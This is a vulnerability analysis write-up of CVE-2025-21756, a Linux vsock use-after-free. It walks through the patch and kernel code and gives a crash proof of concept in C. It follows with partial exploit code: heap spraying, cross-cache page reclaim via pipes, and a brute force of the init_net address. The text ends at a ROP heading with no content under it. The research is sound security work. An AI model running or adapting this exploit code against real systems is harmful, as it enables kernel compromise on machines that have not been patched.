CVE-2025-21756: Vulnerability Reproduction and Exploitation

henry Lv4

CVE-2025-21756

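https://nvd.nist.gov/vuln/detail/CVE-2025-21756 describes the vulnerability. The bug lives in the vsock module: when a socket's transport (the set of backend callbacks that actually carries out data transfer) is reassigned, the socket's binding is removed, which leads to a use-after-free (UAF). This article focuses on a detailed analysis of why the bug triggers. The exploitation part follows the reference exploit, and I also describe some problems I ran into while testing the exploit in practice.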

Vsock

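VSOCK (Virtual Socket) is a socket address family designed for efficient communication between a virtual machine (VM) and its host. It was originally proposed by VMware and later merged into the Linux kernel. It lets applications inside a VM talk directly to the host or to other VMs without going through a traditional network stack such as TCP/IP, which gives lower latency and higher throughput.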

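Typical VSOCK use cases

(1) Host-to-VM communication

  • Example: a monitoring tool on the host reads logs inside the VM directly.
  • Advantage: no virtual network (bridge, NAT) has to be configured, and there is no contention for network bandwidth.

(2) VM-to-VM communication

  • Example: two Kubernetes Pods on the same host (running in different VMs) exchange data over VSOCK.
  • Advantage: more efficient than an overlay network (such as Flannel or Calico).

(3) Nested virtualization

  • In a nested setup (a VM running inside a VM), VSOCK can communicate across several virtualization layers.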

Patch

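The corresponding Linux kernel commit is 3f43540166128951cc1be7ab1ce6b7f05c670d8b.

[Screenshot: patch diff]

A new SOCK_DEAD check is added:

  • The socket is removed from the bound table (vsock_bound_sockets) only when it is flagged SOCK_DEAD (closed or no longer usable).

  • This avoids dropping the binding by mistake during transport reassignment.

vsock_remove_connected(vsk) is kept:

  • Removal from the connected table (vsock_connected_sockets) is unchanged, because the connection state does not depend on the transport.

sock_orphan() is moved earlier, so that sk is flagged SOCK_DEAD at an earlier point.

[Screenshot: sock_orphan() moved earlier in the patch]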

Basics

Struct info

/* Address structure for vSockets. The address family should be set to
 * AF_VSOCK. The structure members should all align on their natural
 * boundaries without resorting to compiler packing directives. The total size
 * of this structure should be exactly the same as that of struct sockaddr.
 */

struct sockaddr_vm {
    __kernel_sa_family_t svm_family;   // address family, must be AF_VSOCK
    unsigned short svm_reserved1;      // reserved, currently unused
    unsigned int svm_port;             // port number
    unsigned int svm_cid;              // context ID (CID); each VM is assigned one
    __u8 svm_flags;                    // flags
    unsigned char svm_zero[sizeof(struct sockaddr) -
                           sizeof(sa_family_t) -
                           sizeof(unsigned short) -
                           sizeof(unsigned int) -
                           sizeof(unsigned int) -
                           sizeof(__u8)];  // padding so the size matches struct sockaddr
};

#define IOCTL_VM_SOCKETS_GET_LOCAL_CID _IO(7, 0xb9)
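
The size requirement stated in the header comment can be checked from user space. The following is a minimal sketch, assuming a Linux system with the UAPI header linux/vm_sockets.h installed; the helper name sockaddr_vm_matches_sockaddr() is made up for illustration and is not part of any API.

```c
#include <assert.h>            /* assert(), for callers of the helper */
#include <sys/socket.h>        /* struct sockaddr, sa_family_t */
#include <linux/vm_sockets.h>  /* struct sockaddr_vm */

/* Hypothetical helper: returns 1 when struct sockaddr_vm has the same size
 * as struct sockaddr, which is what the svm_zero padding is meant to ensure. */
int sockaddr_vm_matches_sockaddr(void)
{
    return sizeof(struct sockaddr_vm) == sizeof(struct sockaddr);
}
```

A program that passes a struct sockaddr_vm to bind() or connect() could call assert(sockaddr_vm_matches_sockaddr()) once at startup as a sanity check on its headers.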

Introduction

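The vsock operations relevant here are:

  • Explicit binding with bind(): when the user calls bind(), the socket is added to the vsock_bound_sockets list.
  • Implicit binding with connect() (autobind): if bind() was not called explicitly, connect() automatically binds a port chosen by the kernel.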

1. vsock_remove_bound(vsk)

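Purpose

  • Removes the socket's binding (deletes it from the vsock_bound_sockets list).
  • Typically called when:
    • a socket that was explicitly bound with bind() is closed with close();
    • a socket that was implicitly bound (autobind) is released.

void vsock_remove_bound(struct vsock_sock *vsk)
{
    if (!list_empty(&vsk->bound_table)) {
        list_del_init(&vsk->bound_table);  // unlink from the bound list
        sock_put(&vsk->sk);                // drop one reference (refcnt--)
    }
}

  • list_del_init(&vsk->bound_table)
    If vsk is on the vsock_bound_sockets list (that is, it is bound), unlink it.
  • sock_put(&vsk->sk)
    Drops one reference to the socket; when refcnt reaches 0 the socket is freed.

When it is used

  • Called when a vsock socket is closed (release) or rebound.
  • Before the fix
    If the transport is reassigned (for example when connect() switches transports), vsock_remove_bound() is called by mistake, which can lead to a UAF (because vsk may never have been bound).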

2. vsock_remove_connected(vsk)

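  • Removes the socket's connection entry (deletes it from the vsock_connected_sockets list).
  • Typically called when:
    • an established socket (connect()/accept()) is closed;
    • the transport is released (for example when virtio-vsock disconnects).

void vsock_remove_connected(struct vsock_sock *vsk)
{
    list_del_init(&vsk->connected_table);  // unlink from the connected list
    sock_put(&vsk->sk);                    // drop one reference (refcnt--)
}

  • list_del_init(&vsk->connected_table)
    If vsk is on the vsock_connected_sockets list (that is, it is connected), unlink it.
  • sock_put(&vsk->sk)
    Drops one reference, which may free the socket.

A note on vsk->bound_table: when a bind is actually performed, a hash is first computed from vsk->local_addr, and the socket is then stored in the matching bucket of the hash table.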

__vsock_remove_bound(vsk);
__vsock_insert_bound(vsock_bound_sockets(&vsk->local_addr), vsk);

The relevant macros are defined below. The accompanying comment explains the logic in detail, so I will not repeat it here.

/* Each bound VSocket is stored in the bind hash table and each connected
* VSocket is stored in the connected hash table.
*
* Unbound sockets are all put on the same list attached to the end of the hash
* table (vsock_unbound_sockets). Bound sockets are added to the hash table in
* the bucket that their local address hashes to (vsock_bound_sockets(addr)
* represents the list that addr hashes to).
*
* Specifically, we initialize the vsock_bind_table array to a size of
* VSOCK_HASH_SIZE + 1 so that vsock_bind_table[0] through
* vsock_bind_table[VSOCK_HASH_SIZE - 1] are for bound sockets and
* vsock_bind_table[VSOCK_HASH_SIZE] is for unbound sockets. The hash function
* mods with VSOCK_HASH_SIZE to ensure this.
*/
#define MAX_PORT_RETRIES 24

#define VSOCK_HASH(addr) ((addr)->svm_port % VSOCK_HASH_SIZE)
#define vsock_bound_sockets(addr) (&vsock_bind_table[VSOCK_HASH(addr)])
#define vsock_unbound_sockets (&vsock_bind_table[VSOCK_HASH_SIZE])
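
To make the bucket layout concrete, the sketch below mirrors the two macros above as plain functions. It is a user-space illustration only: VSOCK_HASH_SIZE is assumed to be 251 here (check include/net/af_vsock.h for your kernel), and the function names bound_bucket() and unbound_bucket() are hypothetical.

```c
#include <assert.h>

#define VSOCK_HASH_SIZE 251  /* assumed value; verify against your kernel tree */

/* Index of the bucket that a bound socket with this port lands in
 * (mirrors VSOCK_HASH(addr) above). */
unsigned int bound_bucket(unsigned int port)
{
    unsigned int idx = port % VSOCK_HASH_SIZE;
    assert(idx < VSOCK_HASH_SIZE);  /* never collides with the unbound slot */
    return idx;
}

/* Index of the extra slot at the end of the table that holds every
 * unbound socket (mirrors vsock_unbound_sockets above). */
unsigned int unbound_bucket(void)
{
    return VSOCK_HASH_SIZE;
}
```

With these assumptions, port 1024 maps to bucket 20, while every unbound socket shares slot 251. Both kinds of socket are linked through the same bound_table list node, which matters for the bug discussed later.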

Func

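This section lists the source of the functions involved in the bug for reference. A quick skim is enough; come back and read them carefully if something later is unclear.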

vsock_create

static int vsock_create(struct net *net, struct socket *sock,
int protocol, int kern)
{
struct vsock_sock *vsk;
struct sock *sk;
int ret;

if (!sock)
return -EINVAL;

if (protocol && protocol != PF_VSOCK)
return -EPROTONOSUPPORT;

switch (sock->type) {
case SOCK_DGRAM:
sock->ops = &vsock_dgram_ops;
break;
case SOCK_STREAM:
sock->ops = &vsock_stream_ops;
break;
case SOCK_SEQPACKET:
sock->ops = &vsock_seqpacket_ops;
break;
default:
return -ESOCKTNOSUPPORT;
}

sock->state = SS_UNCONNECTED;

sk = __vsock_create(net, sock, NULL, GFP_KERNEL, 0, kern); // the core call
if (!sk)
return -ENOMEM;

vsk = vsock_sk(sk);

if (sock->type == SOCK_DGRAM) {
ret = vsock_assign_transport(vsk, NULL);
if (ret < 0) {
sock_put(sk);
return ret;
}
}

vsock_insert_unbound(vsk);

return 0;
}

__vsock_create

Initializes the newly allocated sk.

static struct sock *__vsock_create(struct net *net,
struct socket *sock,
struct sock *parent,
gfp_t priority,
unsigned short type,
int kern)
{
struct sock *sk;
struct vsock_sock *psk;
struct vsock_sock *vsk;

sk = sk_alloc(net, AF_VSOCK, priority, &vsock_proto, kern);
if (!sk)
return NULL;

sock_init_data(sock, sk);

/* sk->sk_type is normally set in sock_init_data, but only if sock is
* non-NULL. We make sure that our sockets always have a type by
* setting it here if needed.
*/
if (!sock)
sk->sk_type = type;

vsk = vsock_sk(sk);
vsock_addr_init(&vsk->local_addr, VMADDR_CID_ANY, VMADDR_PORT_ANY);
vsock_addr_init(&vsk->remote_addr, VMADDR_CID_ANY, VMADDR_PORT_ANY);

sk->sk_destruct = vsock_sk_destruct;
sk->sk_backlog_rcv = vsock_queue_rcv_skb;
sock_reset_flag(sk, SOCK_DONE);

INIT_LIST_HEAD(&vsk->bound_table);
INIT_LIST_HEAD(&vsk->connected_table);
vsk->listener = NULL;
INIT_LIST_HEAD(&vsk->pending_links);
INIT_LIST_HEAD(&vsk->accept_queue);
vsk->rejected = false;
vsk->sent_request = false;
vsk->ignore_connecting_rst = false;
vsk->peer_shutdown = 0;
INIT_DELAYED_WORK(&vsk->connect_work, vsock_connect_timeout);
INIT_DELAYED_WORK(&vsk->pending_work, vsock_pending_work);

psk = parent ? vsock_sk(parent) : NULL;
if (parent) {
vsk->trusted = psk->trusted;
vsk->owner = get_cred(psk->owner);
vsk->connect_timeout = psk->connect_timeout;
vsk->buffer_size = psk->buffer_size;
vsk->buffer_min_size = psk->buffer_min_size;
vsk->buffer_max_size = psk->buffer_max_size;
security_sk_clone(parent, sk);
} else {
vsk->trusted = ns_capable_noaudit(&init_user_ns, CAP_NET_ADMIN);
vsk->owner = get_current_cred();
vsk->connect_timeout = VSOCK_DEFAULT_CONNECT_TIMEOUT;
vsk->buffer_size = VSOCK_DEFAULT_BUFFER_SIZE;
vsk->buffer_min_size = VSOCK_DEFAULT_BUFFER_MIN_SIZE;
vsk->buffer_max_size = VSOCK_DEFAULT_BUFFER_MAX_SIZE;
}

return sk;
}

vsock_bind

static int __vsock_bind(struct sock *sk, struct sockaddr_vm *addr)
{
    struct vsock_sock *vsk = vsock_sk(sk);
    int retval;

    /* First ensure this socket isn't already bound. */
    if (vsock_addr_bound(&vsk->local_addr))
        return -EINVAL;

    /* Now bind to the provided address or select appropriate values if
     * none are provided (VMADDR_CID_ANY and VMADDR_PORT_ANY). Note that
     * like AF_INET prevents binding to a non-local IP address (in most
     * cases), we only allow binding to a local CID.
     */
    if (addr->svm_cid != VMADDR_CID_ANY && !vsock_find_cid(addr->svm_cid))
        return -EADDRNOTAVAIL;

    switch (sk->sk_socket->type) {
    case SOCK_STREAM:       // stream socket
    case SOCK_SEQPACKET:    // sequenced-packet socket
        spin_lock_bh(&vsock_table_lock);
        // connectible sockets are bound by __vsock_bind_connectible()
        retval = __vsock_bind_connectible(vsk, addr);
        spin_unlock_bh(&vsock_table_lock);
        break;

    case SOCK_DGRAM:        // datagram socket
        retval = __vsock_bind_dgram(vsk, addr);
        break;

    default:
        retval = -EINVAL;
        break;
    }

    return retval;
}

This function implements the VSOCK bind operation: it binds a VSOCK socket to the given address.

__vsock_bind_connectible

static int __vsock_bind_connectible(struct vsock_sock *vsk,
                                    struct sockaddr_vm *addr)
{
    static u32 port;
    struct sockaddr_vm new_addr;

    if (!port)
        port = get_random_u32_above(LAST_RESERVED_PORT); // start from a port above LAST_RESERVED_PORT

    // new_addr = addr
    vsock_addr_init(&new_addr, addr->svm_cid, addr->svm_port);

    // if the requested port is VMADDR_PORT_ANY, pick one automatically
    if (addr->svm_port == VMADDR_PORT_ANY) {
        bool found = false;
        unsigned int i;

        for (i = 0; i < MAX_PORT_RETRIES; i++) {
            if (port <= LAST_RESERVED_PORT)
                port = LAST_RESERVED_PORT + 1;

            // each attempt advances the port and checks whether it is taken
            new_addr.svm_port = port++;

            // look for a socket in the bound list that matches this address
            if (!__vsock_find_bound_socket(&new_addr)) {
                found = true;
                break;
            }
        }

        // no free port found: report that the address is unavailable
        if (!found)
            return -EADDRNOTAVAIL;
    } else {
        /* If port is in reserved range, ensure caller
         * has necessary privileges.
         */
        // binding a privileged port (<= LAST_RESERVED_PORT) requires CAP_NET_BIND_SERVICE
        if (addr->svm_port <= LAST_RESERVED_PORT &&
            !capable(CAP_NET_BIND_SERVICE)) {
            return -EACCES;
        }

        if (__vsock_find_bound_socket(&new_addr))
            return -EADDRINUSE;
    }

    vsock_addr_init(&vsk->local_addr, new_addr.svm_cid, new_addr.svm_port);

    /* Remove connection oriented sockets from the unbound list and add them
     * to the hash table for easy lookup by its address. The unbound list
     * is simply an extra entry at the end of the hash table, a trick used
     * by AF_UNIX.
     */
    // remove from the unbound list
    __vsock_remove_bound(vsk);
    // insert into the matching bucket of the bound hash table
    // list_add(&vsk->bound_table, list);
    __vsock_insert_bound(vsock_bound_sockets(&vsk->local_addr), vsk);

    return 0;
}

vsk->transport

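VSOCK is a single address family (AF_VSOCK) for communication between a virtual machine (guest) and the host, but each virtualization platform provides a different data channel:

Platform      Underlying mechanism                              Kernel transport
VMware        VMCI (Virtual Machine Communication Interface)    vmci_transport
KVM / QEMU    Virtio                                            virtio_transport
Hyper-V       VMBus                                             hvs_transport

To support these platforms without entangling the upper layers, VSOCK defines the vsock_transport interface structure to hide the differences.

vsk->transport is a pointer in struct vsock_sock. It points to the set of backend callbacks that actually carries out data transfer, and it is a key abstraction in the VSOCK subsystem.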

struct vsock_transport {
int (*bind)(struct vsock_sock *vsk, struct sockaddr_vm *addr);
int (*connect)(struct vsock_sock *vsk);
int (*release)(struct vsock_sock *vsk);
ssize_t (*send_pkt)(struct vsock_sock *vsk, struct sk_buff *skb);
ssize_t (*recv_stream)(struct vsock_sock *vsk, struct msghdr *msg, size_t len, int flags);
...
};

sock & vsock

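(1) struct sock (generic socket layer)

  • Defined in: include/net/sock.h
  • Role: represents a generic network socket and serves as the base type for sockets of every protocol family (INET, UNIX, VSOCK, and so on).
  • Contains:
    • protocol-independent state (such as the reference count sk_refcnt)
    • socket queues (receive/send buffers)
    • the protocol operations table (struct proto *sk_prot)
    • the network namespace pointer, and so on

(2) struct vsock_sock (VSOCK-specific layer)

  • Defined in: include/net/af_vsock.h

  • Role: the VSOCK-specific extension. It embeds struct sock as its first member and adds VSOCK-specific attributes.

  • Key fields:

    struct vsock_sock {
        struct sock sk;                           // embedded generic sock
        struct sockaddr_vm local_addr;            // local CID + port
        struct sockaddr_vm remote_addr;           // remote CID + port
        // VSOCK-specific state (transport interface, flow control, ...)
        const struct vsock_transport *transport;
        u32 buf_size;
        u32 buf_alloc;
        // ...
    };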
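
The "inheritance by embedding" described above can be sketched in user space. This is only an illustration of the pattern behind the kernel's vsock_sk() helper; the types base_sock and derived_sock and the function to_derived() are hypothetical stand-ins, not kernel definitions.

```c
#include <assert.h>
#include <stddef.h>

struct base_sock {                /* stands in for struct sock */
    int refcnt;
};

struct derived_sock {             /* stands in for struct vsock_sock */
    struct base_sock sk;          /* must be the first member */
    unsigned int local_port;
};

/* The base object sits at offset 0, so a pointer to it is also a valid
 * pointer to the enclosing object. */
struct derived_sock *to_derived(struct base_sock *sk)
{
    static_assert(offsetof(struct derived_sock, sk) == 0,
                  "sk must be the first member");
    return (struct derived_sock *)sk;
}
```

Because the cast relies on the layout only, generic socket code can hand around a struct sock pointer while vsock code recovers its own structure from it at no cost. The same layout fact is why corrupting the memory of one also corrupts the other.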

vsock close(s) call chain

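When close(s) is called on a vsock socket, the call chain is as follows (callee first; each ↳ line is the caller of the line above it):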

__vsock_release(struct sock *sk, int level)
↳ vsock_release(struct socket *sock)
↳ __sock_release()
↳ sock_close()
↳ __fput()
↳ fput()
↳ filp_close()
↳ sys_close(fd)

POC

Link: https://hoefler.dev/articles/attachments/crash.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <linux/kernel.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>

#define MAX_PORT_RETRIES 24 /* net/vmw_vsock/af_vsock.c */
#define VMADDR_CID_NONEXISTING 42

#define pause() {write(STDOUT_FILENO, "[*] Paused (press enter to continue)\n", 37); getchar();}

/* Create socket <type>, bind to <cid, port> and return the file descriptor. */
int vsock_bind(unsigned int cid, unsigned int port, int type)
{
struct sockaddr_vm sa = {
.svm_family = AF_VSOCK,
.svm_cid = cid,
.svm_port = port,
};
int fd;

fd = socket(AF_VSOCK, type, 0);
if (fd < 0) {
perror("socket");
exit(EXIT_FAILURE);
}

if (bind(fd, (struct sockaddr *)&sa, sizeof(sa))) {
perror("bind");
exit(EXIT_FAILURE);
}

return fd;
}

/* Test attempts to trigger a transport release for an unbound socket. This can
* lead to a reference count mishandling.
*/

int main(void) {

int sockets[MAX_PORT_RETRIES];
struct sockaddr_vm addr;
int s, i, alen;

// execute vsock_create & vsock_bind in kernel
s = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);

alen = sizeof(addr);
if (getsockname(s, (struct sockaddr *)&addr, &alen)) {
perror("getsockname");
exit(EXIT_FAILURE);
}

// bind MAX_PORT_RETRIES sockets on consecutive ports (++addr.svm_port) so that the autobind inside the later connect() finds no free port and fails
for (i = 0; i < MAX_PORT_RETRIES; ++i) {
sockets[i] = vsock_bind(VMADDR_CID_ANY, ++addr.svm_port,
SOCK_SEQPACKET);
printf("[+] sockets[%d] == %d\n", i, sockets[i]);
}

// close the initial socket; a new VSOCK socket is created below
close(s);

// wait for input
puts("Setup Finished...");
getchar();

s = socket(AF_VSOCK, SOCK_STREAM, 0);
if (s < 0) {
perror("socket");
exit(EXIT_FAILURE);
}

if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #1 success\n");
exit(EXIT_FAILURE);
}
// connect() #1 failed: transport set, sk in unbound list.

puts("[*] First connect over!");
addr.svm_cid = VMADDR_CID_NONEXISTING; // switch transport
addr.svm_port = VMADDR_PORT_ANY; // dont need
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #2 success\n");
exit(EXIT_FAILURE);
}
// connect() #2 failed: transport unset, sk ref dropped?

// wait for input
puts("Press for Crash...");
getchar();

// Vulnerable system may crash now. [USE THE DANGLING POINTER]
bind(s, (struct sockaddr *)&addr, alen);

// wait for input
getchar();

close(s);
while (i--)
close(sockets[i]);

}

Vulnerability

Setup ENV

s = vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET);

alen = sizeof(addr);
if (getsockname(s, (struct sockaddr *)&addr, &alen)) {
perror("getsockname");
exit(EXIT_FAILURE);
}

for (i = 0; i < MAX_PORT_RETRIES; ++i)
sockets[i] = vsock_bind(VMADDR_CID_ANY, ++addr.svm_port,
SOCK_SEQPACKET);

close(s);

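This step prepares the environment for triggering the bug (see the logic of __vsock_bind_connectible above). vsock_bind(VMADDR_CID_LOCAL, VMADDR_PORT_ANY, SOCK_SEQPACKET) creates a vsock socket s and binds it, which is really just a way to learn addr.svm_port. The for loop then binds sockets to the ports that follow it, occupying all MAX_PORT_RETRIES ports that the kernel is willing to try. As a result, when a new vsock socket is created later and connect() is called on it, the automatic bind finds no free port and returns an error, which sets up the vulnerable path.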
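
The port exhaustion can be reproduced in a small user-space model of the autobind loop. This is a sketch under simplifying assumptions, not kernel code: CIDs and the reserved-port range are ignored, the port space is shrunk to MODEL_PORTS entries, and all names (model_reset, model_bind, model_close, model_autobind) are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>

#define MAX_PORT_RETRIES 24   /* same value as in net/vmw_vsock/af_vsock.c */
#define MODEL_PORTS 4096      /* hypothetical: a small port space for the model */

static bool taken[MODEL_PORTS];   /* taken[p] is true while port p is bound */
static unsigned int cursor;       /* plays the role of the kernel's static `port` */

/* Start from an empty table with the cursor at `start`. */
void model_reset(unsigned int start)
{
    for (unsigned int p = 0; p < MODEL_PORTS; p++)
        taken[p] = false;
    cursor = start;
}

/* Explicit bind to `port`; returns false where the kernel returns -EADDRINUSE. */
bool model_bind(unsigned int port)
{
    assert(port < MODEL_PORTS);
    if (taken[port])
        return false;
    taken[port] = true;
    return true;
}

/* close() on a bound socket frees its port. */
void model_close(unsigned int port)
{
    assert(port < MODEL_PORTS);
    taken[port] = false;
}

/* Autobind: try at most MAX_PORT_RETRIES consecutive ports from the cursor.
 * Returns the chosen port, or -1 where the kernel returns -EADDRNOTAVAIL. */
int model_autobind(void)
{
    for (int i = 0; i < MAX_PORT_RETRIES; i++) {
        unsigned int candidate = cursor++;
        assert(candidate < MODEL_PORTS);
        if (!taken[candidate]) {
            taken[candidate] = true;
            return (int)candidate;
        }
    }
    return -1;
}
```

Replaying the setup with the cursor starting at 2000: the first model_autobind() returns 2000, model_bind() then takes 2001 through 2024, and model_close(2000) mirrors close(s). The next model_autobind() walks exactly those 24 occupied ports and returns -1. In this model a further model_autobind() returns 2025, simply because the cursor has moved past the occupied range.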

STEP.1

vsock_create() (refcnt=1) calls vsock_insert_unbound() (refcnt=2)

// only socket() is called here; it reaches vsock_create() in the kernel
s = socket(AF_VSOCK, SOCK_STREAM, 0);

[Screenshot: debugger output for STEP.1]

STEP.2

transport->release() calls vsock_remove_bound() without checking if sk was bound and moved to bound list (refcnt=1)

/*---------First connect----------*/
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #1 success\n");
exit(EXIT_FAILURE);
}
// connect() #1 failed: transport set, sk in unbound list.

/*---------Second connect----------*/
addr.svm_cid = VMADDR_CID_NONEXISTING;
addr.svm_port = VMADDR_PORT_ANY;
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #2 success\n");
exit(EXIT_FAILURE);
}
// connect() #2 failed: transport unset, sk ref dropped?

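The first connect() takes the following execution path:

[Screenshot: call path of the first connect()]

At this point vsock_auto_bind has failed, so vsk is still on the unbound list. Note that vsock_auto_bind fails because the setup phase exhausted the ports that autobind is willing to try under VMADDR_CID_ANY, so it returns -EADDRNOTAVAIL. The relevant code is:

[Screenshot: port search loop in __vsock_bind_connectible]

Verification in the kernel debugger:

[Screenshot: debugger output for the failed autobind]

The purpose of this first connect() is explained in the analysis of the second connect() below.

The second connect() takes the following execution path:

[Screenshot: call path of the second connect()]

Now look at vsock_assign_transport, the function in which the UAF is actually triggered:

[Screenshot: source of vsock_assign_transport]

After transport->release runs, vsock_deassign_transport sets transport to NULL.

To make this easier to follow, here is what an actual debugging session shows:

[Screenshot: debugger output during the first connect()]

During the first connect(), vsk->transport has not been initialized yet, so its value is 0, as the screenshot above shows. Later in the function vsk->transport is set to new_transport, which is loopback_transport: the first connect() is issued with addr.svm_cid equal to VMADDR_CID_LOCAL (remote_cid in the kernel), so the transport is set to transport_local (that is, loopback_transport). This is why the first connect() is needed.

[Screenshot: debugger output during the second connect()]

During the second connect(), vsk->transport and new_transport hold the values shown above. The kernel calls vsk->transport->release(vsk), and the function pointer resolves to virtio_transport_release:

[Screenshot: source of virtio_transport_release]

That function calls virtio_transport_remove_sock:

[Screenshot: source of virtio_transport_remove_sock]

This drops the socket's reference count by one.

STEP.3

Note that vsock_auto_bind drops one more reference here:

[Screenshot: call into vsock_auto_bind]

which eventually executes:

[Screenshot: code reached from vsock_auto_bind]

Unlike the first connect(), where the bind fails, the second connect() can perform the bind normally. As Step.2 showed, transport->release resets the state of vsk (see the screenshot below), so when __vsock_bind_connectible calls __vsock_find_bound_socket it returns NULL (the VSOCK address is not occupied by a vsk) and the bind completes normally.

[Screenshot: vsk state after transport->release]

Kernel debugging confirms this: because refcnt = 0, execution enters __sk_free(sk), which frees the object, so the subsequent __vsock_insert_bound triggers the UAF.

[Screenshot: debugger output showing refcnt reaching 0]

The crash looks like this:

[Screenshot: crash log]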
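
The reference-count sequence from STEP.1 to STEP.3 can be replayed with a small user-space model. This is a sketch for illustration, not kernel code: struct model_sock and the rc_* functions are hypothetical stand-ins, and the `patched` flag approximates the SOCK_DEAD check described in the Patch section.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical stand-in for the few fields of struct vsock_sock that
 * matter for the reference count. */
struct model_sock {
    int  refcnt;    /* stands in for sk_refcnt */
    bool linked;    /* bound_table is on the unbound list or in a bound bucket */
    bool dead;      /* stands in for the SOCK_DEAD flag */
    bool freed;     /* set once refcnt drops to 0 */
};

static void rc_put(struct model_sock *s)
{
    assert(s->refcnt > 0);
    if (--s->refcnt == 0)
        s->freed = true;
}

/* vsock_create() (refcnt=1) followed by vsock_insert_unbound() (refcnt=2). */
void rc_create(struct model_sock *s)
{
    s->refcnt = 1;
    s->dead = false;
    s->freed = false;
    s->linked = true;
    s->refcnt++;
}

/* transport->release() during transport reassignment.
 * With patched == true the binding is kept unless the socket is dead. */
void rc_transport_release(struct model_sock *s, bool patched)
{
    if (patched && !s->dead)
        return;
    if (s->linked) {
        s->linked = false;
        rc_put(s);
    }
}

/* Bind path: unconditional __vsock_remove_bound(), then __vsock_insert_bound(). */
void rc_bind(struct model_sock *s)
{
    s->linked = false;   /* list_del_init(): a no-op if already unlinked */
    rc_put(s);           /* sock_put(): dropped regardless */
    if (s->freed)
        return;          /* the kernel would now touch freed memory */
    s->linked = true;    /* __vsock_insert_bound(): list_add() */
    s->refcnt++;         /* ... plus sock_hold() */
}
```

In the unpatched sequence the count goes 2, 1, 0 and the object is freed while the file descriptor still refers to it. With `patched` set, rc_transport_release() leaves the socket on its list, so the bind path ends with the count back at 2.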

Exploit

The original write-up covers this part in detail, so here I mainly give my own understanding.

Step.1 Spray vsock heap object and alloc target vsock for uaf

   puts("[+] pre alloc sockets");

int pre[PRE];
for (int i = 0; i < PRE; i++)
pre[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);

puts("[+] alloc target");
s = socket(AF_VSOCK, SOCK_STREAM, 0);
if (s < 0) {
perror("socket");
exit(EXIT_FAILURE);
}

// testing
puts("[+] post-alloc objects");
int post[POST];
for (int i = 0; i < POST; i++)
post[i] = socket(AF_VSOCK, SOCK_SEQPACKET, 0);


puts("[+] trigger uaf");
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #1 success\n");
exit(EXIT_FAILURE);
}
// connect() #1 failed: transport set, sk in unbound list.

addr.svm_cid = VMADDR_CID_NONEXISTING;
addr.svm_port = VMADDR_PORT_ANY;
if (!connect(s, (struct sockaddr *)&addr, alen)) {
fprintf(stderr, "Unexpected connect() #2 success\n");
exit(EXIT_FAILURE);
}
// connect() #2 failed: transport unset, sk ref dropped?

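In my tests, vsock sockets turned out to be allocated from a dedicated slab cache, as shown below, so the exploit has to rely on a cross-cache attack. This step sprays the relevant objects on the heap and then triggers the UAF on the target vuln_vsk.

[Screenshot: slab cache information for vsock sockets]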

Step.2 Release target slab back to buddy system

puts("[+] uaf finished!..");


puts("[+] fill up the cpu partial list");
for (int i = 4; i < FLUSH; i += OBJS_PER_SLAB)
close(junk[i]);

puts("[+] free all the pre/post alloc-ed objects");
for (int i = 0; i < POST; i++)
close(post[i]);
for (int i = 0; i < PRE; i++)
close(pre[i]);

puts("[+] close the junk bound sockets");
for (int i = 0; i < FLUSH; i++)
close(junk[i]);

sleep(3);

This step releases vuln_slab, the slab that holds vuln_vsk, back to the buddy allocator so that the page can be hijacked later (implemented with pipe_buffer).

Step.3 Hijack vuln_slab and detect whether hits target slab by brute force

int pipes[NUM_PIPES][2];
char page[PAGE_SIZE];
memset(page, 2, PAGE_SIZE);

puts("[+] reclaim page");
pause();

int w = 0;
int j;
i = 0;
while (1) { // TODO: i < NUM_PIPES, improve stability

sleep(0.1); // note: sleep() takes whole seconds, so 0.1 truncates to 0

if (pipe(&pipes[i][0]) < 0) {
perror("pipe");
break;
}

w = 0;
while (w < PAGE_SIZE) {
ssize_t written = write(pipes[i][1], page, 8);
j = query_vsock_diag();
w += written;
if (j != 48) goto out;
}
printf(".");
fflush(stdout);
i++;
if (i % 32 == 0) puts("");
}

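The exploit uses a fairly neat trick to tell whether vuln_vsk has been overwritten: it writes 8 bytes at a time and calls query_vsock_diag() after each write(), checking whether the query still succeeds (the reply length stays at 48). query_vsock_diag() ends up in vsock_diag_dump, which performs two checks:

[Screenshot: the two checks in vsock_diag_dump]

The second check is easy to satisfy: set sk->sk_state to 2. sock_net(sk) reads the field at offset 0x30 of sk, so if that field is corrupted the lookup fails (which ultimately shows up in the len value). As the screenshot below shows, the value is compared against init_net, which is 0xffffffff84bb1f80 here, so passing this check requires brute-forcing the address of init_net (Step.4).

[Screenshot: comparison against init_net in the debugger]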

Step.4 Brute force the address of init_net

long base = 0xffffffff84bb1000; // probably need to change for aslr
long off = 0;
long addy;
printf("[+] attempting net overwrite (aslr bypass).\n");

while (off < 0xffffffff) {

// release the page of vsk
close(pipes[i][0]);
close(pipes[i][1]);

if (pipe(&pipes[i][0]) < 0) {
perror("pipe");
}

addy = base + off;

write(pipes[i][1], page, w - 8);
write(pipes[i][1], &addy, 8); //position of sock_net(sk)

if (off % 256 == 0) {
printf("+");
fflush(stdout);
}

j = query_vsock_diag();
if (j == 48) {
printf("\n[*] LEAK init_net @ 0x%lx\n", base + off);
goto out2;
}

off += 128; // TODO: modify for aslr?

}

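The code starts from an estimated base address for init_net, 0xffffffff84bb1000, and brute-forces upward from there. Whenever a candidate value written into the net field fails the check in vsock_diag_dump, the exploit releases vuln_slab again, reclaims it, and tries the next write.

In a real attack, the chance that this repeated free-and-reclaim of the page hits the target every single time is low. The test environment here has a very clean file system, which is why the PoC succeeds fairly often under these conditions; keep this in mind.

Also, the guessed address is the value seen with address randomization disabled, so brute-forcing it in a real setting would be even harder.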

Step.5 Hijack control flow and Construct ROP

